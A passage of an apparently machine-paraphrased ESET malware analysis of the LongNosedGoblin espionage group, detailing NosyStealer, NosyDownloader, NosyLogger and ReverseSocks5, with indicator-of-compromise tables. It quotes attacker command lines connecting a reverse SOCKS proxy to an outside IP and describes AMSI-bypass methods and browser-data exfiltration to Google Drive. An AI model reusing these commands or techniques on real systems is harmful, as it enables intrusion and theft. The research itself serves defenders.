style=\"font-family: courier new, courier, monospace;\">0x7A<\/span>. The result&#8217;s <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/TheWover\/donut\">Donut<\/a> shellcode that&#8217;s injected into the operating <span style=\"font-family: courier new, courier, monospace;\">pmp.exe<\/span> course of (NosyStealer Stage 1) utilizing the <span style=\"font-family: courier new, courier, monospace;\">CreateRemoteThread<\/span> API within the <span style=\"font-family: courier new, courier, monospace;\">SERV.dll<\/span> case, and right into a newly created <span style=\"font-family: courier new, courier, monospace;\">notepad.exe<\/span> course of utilizing the <span style=\"font-family: courier new, courier, monospace;\">SetThreadContext<\/span> API within the <span style=\"font-family: courier new, courier, monospace;\">msi.dll<\/span> case.<\/p>\n<h4>NosyStealer Stage 3 \u2013 loader<a rel=\"nofollow\" target=\"_blank\" id=\"NosyStealer Stage 3 \u2013 loader\"\/><\/h4>\n<p>As talked about within the <em><a rel=\"nofollow\" target=\"_blank\" href=\"#NosyStealer Stage 2 \u2013 injector\">NosyStealer Stage 2 \u2013 injector<\/a> <\/em>part, this stage is shellcode containing an embedded PE file that&#8217;s decrypted, loaded, and executed in reminiscence utilizing Donut\u2019s reflective loader. The extracted binary is a C\/C++ utility.<\/p>\n<p>Like <em><a rel=\"nofollow\" target=\"_blank\" href=\"#NosyDoor Stage 2 \u2013 AppDomainManager injection\">NosyDoor Stage 2 \u2013 AppDomainManager injection<\/a><\/em>, this stage makes use of a identified approach to bypass AMSI. It patches the <span style=\"font-family: courier new, courier, monospace;\">AmsiScanBuffer<\/span> operate within the loaded <span style=\"font-family: courier new, courier, monospace;\">amsi.dll<\/span> with code that returns <span style=\"font-family: courier new, courier, monospace;\">E_INVALIDARG<\/span> (see Determine\u00a06).<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 6. Hex-Rays decompiled code that patches AmsiScanBuffer\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-6.png\" alt=\"Figure 6. Hex-Rays decompiled code that patches AmsiScanBuffer\" width=\"\" height=\"\"\/><figcaption><em>Determine 6. Hex-Rays decompiled code that patches <\/em><span style=\"font-family: courier new, courier, monospace;\">AmsiScanBuffer<\/span><\/figcaption><\/figure>\n<p>Then it creates a Home windows scheduled job with the identify Day by day Test Process that runs <span style=\"font-family: courier new, courier, monospace;\">C:ProgramDataMicrosoftWDFpmp.exe<\/span> (NosyStealer Stage 1) day-after-day with permissions of the native system account.<\/p>\n<p>After patching the AMSI operate and persisting, it continues equally to the earlier stage \u2013 it decrypts the following stage from the hardcoded path <span style=\"font-family: courier new, courier, monospace;\">C:ProgramDataMicrosoftWDFmfd.dat<\/span> through a single-byte XOR cipher with key <span style=\"font-family: courier new, courier, monospace;\">0x7A<\/span>, the place the ensuing blob is one other Donut shellcode, which is then executed.<\/p>\n<h4>NosyStealer Stage 4 \u2013 payload<\/h4>\n<p>Once more, like <em><a rel=\"nofollow\" target=\"_blank\" href=\"#NosyStealer Stage 3 \u2013 loader\">NosyStealer Stage 3 \u2013 loader<\/a>,<\/em> this stage is shellcode that decrypts, hundreds, and executes an embedded PE file in reminiscence utilizing Donut\u2019s reflective loader. This time, the extracted binary is a Go utility that steals browser knowledge from the Microsoft Edge and Google Chrome net browsers. To take action, it downloads a file named <span style=\"font-family: courier new, courier, monospace;\">config<\/span> from Google Docs. When the file comprises a sufferer\u2019s ID, NosyStealer reads Microsoft Edge and Google Chrome profile knowledge, archives it with tar, and encrypts it with a customized cipher.<\/p>\n<p>NosyStealer then exfiltrates the encrypted tar archive to Google Drive. Determine\u00a07 is an instance of the JSON-formatted configuration, embedded within the binary, required to entry Google Drive and Google Docs.<\/p>\n<pre class=\"language-markup\"><code>{\n  \"kind\": \"service_account\",\n  \"project_id\": \"dev0-411506\",\n  \"private_key_id\": \"[redacted]\",\n  \"private_key\": \"[redacted]\",\n  \"client_email\": \"dev0-660@dev0-411506.iam.gserviceaccount.com\",\n  \"client_id\": \"[redacted]\",\n  \"auth_uri\": \"https:\/\/accounts.google.com\/o\/oauth2\/auth\",\n  \"token_uri\": \"https:\/\/oauth2.googleapis.com\/token\",\n  \"auth_provider_x509_cert_url\": \"https:\/\/www.googleapis.com\/oauth2\/v1\/certs\",\n  \"client_x509_cert_url\": \n\"https:\/\/www.googleapis.com\/robotic\/v1\/metadata\/x509\/dev0-660percent40dev0-411506.iam.gserviceaccount.com\",\n  \"universe_domain\": \"googleapis.com\"\n}<\/code><\/pre>\n<p style=\"text-align: center;\"><em>Determine\u00a07. NosyStealer configuration<\/em><\/p>\n<p>NosyStealer additionally information errors and standing messages to a Google Docs file named <span style=\"font-family: courier new, courier, monospace;\">log<\/span>, which can embody data from multiple sufferer. The standing message contains the fixed <span style=\"font-family: courier new, courier, monospace;\">9<\/span>, probably a sign of the NosyStealer model. The total standing message format, the place <span style=\"font-family: courier new, courier, monospace;\"><machine_local_ips\/><\/span> represents an inventory of native IPv4 addresses of community adapters, is as follows:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\"><local_date> &#8211; <victim_id> &#8211; 9 &#8211; heartbeat <machine_local_ips\/><\/victim_id><\/local_date><\/span><\/p>\n<h3>NosyDownloader<\/h3>\n<p>Analyzing ESET telemetry knowledge, we additionally discovered within the networks compromised by LongNosedGoblin numerous initially benign functions that had been patched with malicious code. This code comprises a downloader that we named NosyDownloader, which executes a series of obfuscated instructions handed to a spawned PowerShell course of as one lengthy command line argument, that means that the script will not be saved on disk. Each subsequent stage is encoded with base64, the place the final one is moreover deflated with gzip.<\/p>\n<p>Every stage is briefly described in Desk 3. Like NosyDoor Stage 2 and NosyStealer Stage 3, the second stage right here additionally bypasses AMSI. On this case, NosyDownloader makes use of Matt Graeber\u2019s reflection methodology and disabling script logging strategies made out there on GitHub to bypass AMSI.<\/p>\n<p style=\"text-align: center;\"><em>Desk\u00a03. NosyDownloader script phases<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"66\"><strong>Stage<\/strong><\/td>\n<td width=\"577\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"66\">1<\/td>\n<td width=\"577\">Decodes and executes Stage 2 in a newly created PowerShell course of that runs in a hidden window.<\/td>\n<\/tr>\n<tr>\n<td width=\"66\">2<\/td>\n<td width=\"577\">Bypasses AMSI, then decodes and executes Stage 3.<\/td>\n<\/tr>\n<tr>\n<td width=\"66\">3<\/td>\n<td width=\"577\">Decodes, decompresses, and executes Stage 4.<\/td>\n<\/tr>\n<tr>\n<td width=\"66\">4<\/td>\n<td width=\"577\">Downloads a payload and executes it in reminiscence with <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.utility\/invoke-expression?view=powershell-7.4\" target=\"_blank\" rel=\"noopener\">Invoke-Expression<\/a>.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>We suspect that NosyDownloader was used to deploy ReverseSocks5, NosyLogger, and an argument runner, as we noticed them within the span of 1 week after NosyDownloader was executed.<\/p>\n<h3>NosyLogger<\/h3>\n<p>We additionally recognized a C#\/.NET keylogger that we named NosyLogger. It appears to be a modified model of the open-source keylogger <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/zorggomat\/DuckSharp\" target=\"_blank\" rel=\"noopener\">DuckSharp<\/a>, with the primary variations being that it doesn\u2019t ship emails or translate logged keys into the Cyrillic alphabet.<\/p>\n<p>The malware initially checks whether or not a debugger is current through the <span style=\"font-family: courier new, courier, monospace;\">IsDebuggerPresent<\/span> and <span style=\"font-family: courier new, courier, monospace;\">CheckRemoteDebuggerPresent<\/span> APIs; if not, it begins its keylogging performance.<\/p>\n<p>Window identify, pressed keys, and pasted clipboard content material are accrued in reminiscence. NosyLogger encrypts these knowledge batches utilizing AES with the important thing <span style=\"font-family: courier new, courier, monospace;\">D53FCC01038E20193FBD51B7400075CF7C9C4402B73DA7B0DB836B000EBD8B1C<\/span> and a <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/dotnet\/api\/system.security.cryptography.symmetricalgorithm.generateiv\" target=\"_blank\" rel=\"noopener\">randomly generated<\/a> initialization vector of fastened size, the place the vector is appended to the encrypted batch of information. The encrypted knowledge batch is then appended to the file on the hardcoded location <span style=\"font-family: courier new, courier, monospace;\">C:WindowsTempTS_D418.tmp<\/span> in hexadecimal string format. In that file, every encrypted knowledge batch is separated by a newline adopted by the string <span style=\"font-family: courier new, courier, monospace;\">ENDBLOCK<\/span>. This technique of encrypting and storing accrued knowledge to the file takes place each 10 seconds. This file will not be exfiltrated by NosyLogger.<\/p>\n<h3>Different deployed instruments<\/h3>\n<h4>ReverseSocks5<\/h4>\n<p>Amongst different malware deployed by LongNosedGoblin, we discovered an open-source reverse SOCKS5 proxy, written in Go, referred to as <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/Acebond\/ReverseSocks5\" target=\"_blank\" rel=\"noopener\">ReverseSocks5<\/a>. We found it after we seen the next command line arguments getting used:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">-connect 118.107.234[.]29:8080 -psk &#8220;58fi04qQ&#8221; \/F<\/span><\/p>\n<p>The choice <span style=\"font-family: courier new, courier, monospace;\">-psk<\/span> is used to set a preshared key for encryption and authentication. The argument <span style=\"font-family: courier new, courier, monospace;\">\/F<\/span> will not be dealt with by ReverseSocks5 and might be unintentional; this argument is usually used with <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/schtasks-create\" target=\"_blank\" rel=\"noopener\">schtasks create<\/a>.<\/p>\n<p>We then seen one other set of command line arguments (which wouldn&#8217;t have the <span style=\"font-family: courier new, courier, monospace;\">\/F<\/span> argument anymore):<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">-connect 118.107.234[.]29:8080 -psk &#8220;15Kaf22N3b&#8221;<\/span><\/p>\n<p>This second set corresponds to execution of ReverseSocks5, the place we noticed PowerShell because the guardian course of. NosyDownloader was additionally executed throughout this time, indicating that the pattern was in all probability deployed with it.<\/p>\n<h4>Argument runner<\/h4>\n<p>It is a C#\/.NET utility with inner identify <span style=\"font-family: courier new, courier, monospace;\">Binary<\/span>; the only real goal of this software is to run an utility handed as an argument. We noticed the filename <span style=\"font-family: courier new, courier, monospace;\">TCOEdge.exe<\/span> as a part of the command line together with arguments which can be particular to the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/ffmpeg.org\/\" target=\"_blank\" rel=\"noopener\">FFmpeg<\/a> multimedia framework; it was used to document the display and seize audio, saving it to <span style=\"font-family: courier new, courier, monospace;\">C:WindowsTempoutput.avi<\/span>.<\/p>\n<h2>Conclusion<\/h2>\n<p>LongNosedGoblin is a China-aligned APT group that targets governmental entities in Southeast Asia and Japan. Our evaluation of its campaigns revealed quite a few items of customized malware, which the group makes use of to conduct cyberespionage in opposition to its victims. Notably, LongNosedGoblin employs Group Coverage to carry out lateral motion throughout the compromised community.<\/p>\n<blockquote>\n<div><em>For any inquiries about our analysis printed on WeLiveSecurity, please contact us at <a rel=\"nofollow\" target=\"_blank\" style=\"background-color: #f4f4f4;\" href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan\/mailto:threatintel@eset.com?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=autotagging&amp;utm_content=eset-research&amp;utm_term=en\">threatintel@eset.com<\/a>.\u00a0<\/em><\/div>\n<div><em>ESET Analysis gives personal APT intelligence experiences and knowledge feeds. For any inquiries about this service, go to the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan&amp;sfdccampaignid=7011n0000017htTAAQ\" target=\"_blank\" rel=\"noopener\">ESET Menace Intelligence<\/a> web page.<\/em><\/div>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<p>A complete listing of indicators of compromise (IoCs) and samples might be present in <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/eset\/malware-ioc\/tree\/master\/longnosedgoblin\" target=\"_blank\" rel=\"noopener\">our GitHub repository<\/a>.<\/p>\n<h3>Information<\/h3>\n<table style=\"width: 781px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td style=\"width: 209px;\"><strong>SHA-1<\/strong><\/td>\n<td style=\"width: 191px;\"><strong>Filename<\/strong><\/td>\n<td style=\"width: 254.797px;\"><strong>Detection<\/strong><\/td>\n<td style=\"width: 302.203px;\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">4E3F6E9D0F443F4C4297<wbr\/>4A0551EEE957B498DA3D<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">Historical past.ini<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Spy.Agent.EUU<\/td>\n<td style=\"width: 302.203px;\">NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">CD745BD2636F607CC4FB<wbr\/>9389535BF3579321CA72<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">Historical past.ini<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Spy.Agent.EUU<\/td>\n<td style=\"width: 302.203px;\">NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">154A35DD4117DB760699<wbr\/>C2092AFB307E94008506<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">Registry.plo<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/TrojanDropper<wbr\/>.Agent.GBQ<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 1.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">B1D4A283A9CCC9E34993<wbr\/>DD2093A904AFBD88B9B9<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">Registry.pol<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/TrojanDropper<wbr\/>.Agent.GBQ<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 1.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">77D2A8CB316B7A470E76<wbr\/>E163551A00BB16A696C5<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">Registry.plo<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/TrojanDropper<wbr\/>.Agent.GBQ<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 1.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">F93E449C5520C4718E28<wbr\/>4375C54BE33711505985<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">Registry.pol<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/TrojanDropper<wbr\/>.Agent.GBQ<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 1.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">1959E2198D6F81B2604D<wbr\/>F7AC1F508AEB7A6FA07E<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">SharedReg.dll<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Kryptik.AJBA<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 2.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">E0B44715BC4C327C04E6<wbr\/>3F881ECC087B7ACBD306<\/span><\/td>\n<td style=\"width: 191px;\">N\/A<\/td>\n<td style=\"width: 254.797px;\">MSIL\/Agent.ESF<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 3.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">43C8AE8561E7E3BF9CD7<wbr\/>48136C091099E5CBEEEE<\/span><\/td>\n<td style=\"width: 191px;\">N\/A<\/td>\n<td style=\"width: 254.797px;\">MSIL\/Agent.ESF<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 3.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">D11FC2D6159CB8BA392B<wbr\/>145B3EE4ADFA15DB4C83<\/span><\/td>\n<td style=\"width: 191px;\">N\/A<\/td>\n<td style=\"width: 254.797px;\">MSIL\/Agent.ESF<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 3.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">A0A80AC293645076EBAE<wbr\/>393FF0A6A4229E2EDE1C<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">pmp.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">Win64\/Agent.DNY<\/td>\n<td style=\"width: 302.203px;\">NosyStealer stage 1.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">DDBBAE33E04A49D17DD2<wbr\/>4D85B637667B4407AE19<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">SERV.dll<\/span><\/td>\n<td style=\"width: 254.797px;\">Win64\/Agent.DNX<\/td>\n<td style=\"width: 302.203px;\">NosyStealer stage 2.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">60158C509446893B3B57<wbr\/>D40DC4B4B3795FCDF369<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">HPSupportAssistant<wbr\/>.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">PowerShell\/TrojanDown<wbr\/>loader.Agent.JJO<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">F5B7440EE25116A49EC5<wbr\/>EE82507B353880217AC1<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">RTLWVern.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">PowerShell\/Agent.BDR<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">85939C56BFCACD0993E6<wbr\/>FB9F7CFD6137601FB7D4<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">hpSmartAdapter.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">Win32\/Agent.AGIJ<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">C66F9FEC0F8CBF577840<wbr\/>944F61198A75B3E2A58C<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">hputils.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">Win32\/Agent.AGII<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">4C2FCCE3BAB4144D90C7<wbr\/>41A6D77ADF209C786B54<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">IGCCSvc.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Spy.Key<wbr\/>logger.FVW<\/td>\n<td style=\"width: 302.203px;\">NosyLogger.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">161A25CB0B8FA998BF1B<wbr\/>DEE31F06F24876453CDF<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">AdobeHelper.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">WinGo\/ReverseShell.DX<\/td>\n<td style=\"width: 302.203px;\">ReverseSocks5.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">4D61A9FBBCC4F7A37BE2<wbr\/>1548B55BB5B9B837F83B<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">msi.dll<\/span><\/td>\n<td style=\"width: 254.797px;\">Win64\/Agent.DOT<\/td>\n<td style=\"width: 302.203px;\">NosyStealer stage 2.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">5AE440805719250AAEFE<wbr\/>E9B39DACD23D2FB573CD<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">TCOCertified.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Runner.BW<\/td>\n<td style=\"width: 302.203px;\">Argument runner.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">E93D32C739825519A10A<wbr\/>4C52C5F1EE33936E4FDB<\/span><\/td>\n<td style=\"width: 191px;\">N\/A<\/td>\n<td style=\"width: 254.797px;\">WinGo\/PSW.Agent.FZ<\/td>\n<td style=\"width: 302.203px;\">NosyStealer stage 4.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">212126896D38C1EE5732<wbr\/>0FB6940FED7A6E30D9EA<\/span><\/td>\n<td style=\"width: 191px;\">N\/A<\/td>\n<td style=\"width: 254.797px;\">Win32\/Agent.AGHB<\/td>\n<td style=\"width: 302.203px;\">NosyStealer stage 3.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">CFFE15AA4D0F9E6577CC<wbr\/>B509ACE9C588937943F2<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">HPNDFInterface.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">PowerShell\/TrojanDown<wbr\/>loader.Agent.JJO<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">6AC22CE60B706E3B9A79<wbr\/>27633116911E1087C0D4<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">bemsvc.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">PowerShell\/TrojanDown<wbr\/>loader.Agent.JJO<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">2C1959DD85424CEDC96B<wbr\/>1BB86A95FCA440CB9E36<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">HPDeviceCheck.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">Win32\/Agent.AGWU<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">46107B1292B830D9BCEB<wbr\/>BDA6EEDB32FBC05707B4<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">HP.OCF.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">Win32\/Patched.NLL<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">581464978C29B2BC79C6<wbr\/>5766E62011C94D2CBEAB<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">HP.OCF.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">Win32\/Patched.NLL<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">0D91A0E52212EC44E32C<wbr\/>47F7760AF3B473B72798<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">ax_installer.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">PowerShell\/TrojanDown<wbr\/>loader.Agent.JJO<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">48D715466857FB0C6CD0<wbr\/>249DE6D960FC199438E1<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">btdevmanager.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Spy.Keylogger<wbr\/>_AGen.DL<\/td>\n<td style=\"width: 302.203px;\">NosyLogger.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">563677CFACD328EA2478<wbr\/>836E58A8BD0DF11206A3<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">information.txt<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Spy.Agent.EUU<\/td>\n<td style=\"width: 302.203px;\">NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">AC2264C56121141DAF75<wbr\/>1A3852CD34F3ACB1D63C<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">ntrtscan.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Spy.Agent.EUU<\/td>\n<td style=\"width: 302.203px;\">NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">70A615BC580522E1EEE4<wbr\/>B61394DC7A247FE47022<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">ntrtscan.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Spy.Agent.EUU<\/td>\n<td style=\"width: 302.203px;\">NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">E9C5E4AA335DFBD25786<wbr\/>234A58CE4C9C551D1A41<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">oci.dll<\/span><\/td>\n<td style=\"width: 254.797px;\">Win64\/Kryptik_A<wbr\/>Gen.UW<\/td>\n<td style=\"width: 302.203px;\">Loader of unknown malware (probably Cobalt Strike).<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">EC9CEB599DF3BDFFAD53<wbr\/>6900D0E6D48E2E5FF12B<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">mscorsvc.dll<\/span><\/td>\n<td style=\"width: 254.797px;\">Win64\/Kryptik.EHP<\/td>\n<td style=\"width: 302.203px;\">Loader of unknown malware (probably Cobalt Strike).<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Community<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"142\"><strong>IP<\/strong><\/td>\n<td width=\"190\"><strong>Area<\/strong><\/td>\n<td width=\"104\"><strong>Internet hosting supplier<\/strong><\/td>\n<td width=\"71\"><strong>First seen<\/strong><\/td>\n<td width=\"113\"><strong>Particulars<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">118.107.234[.]26<\/span><\/td>\n<td width=\"190\"><span style=\"font-family: courier new, courier, monospace;\">www.sslvpn<wbr\/>server[.]com<\/span><\/td>\n<td width=\"104\">IRT\u2011IPSERVERONE\u2011MY<\/td>\n<td width=\"71\">2022\u201104\u201109<\/td>\n<td width=\"113\">NosyDownloader C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">103.159.132[.]30<\/span><\/td>\n<td width=\"190\"><span style=\"font-family: courier new, courier, monospace;\">www.thread<wbr\/>stub[.]com<\/span><\/td>\n<td width=\"104\">IRT-FBP-MY<\/td>\n<td width=\"71\">2023\u201110\u201103<\/td>\n<td width=\"113\">NosyDownloader C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">101.99.88[.]113<\/span><\/td>\n<td width=\"190\"><span style=\"font-family: courier new, courier, monospace;\">www.blaze<wbr\/>newso[.]com<\/span><\/td>\n<td width=\"104\">Shinjiru Expertise Sdn Bhd<\/td>\n<td width=\"71\">2024\u201108\u201123<\/td>\n<td 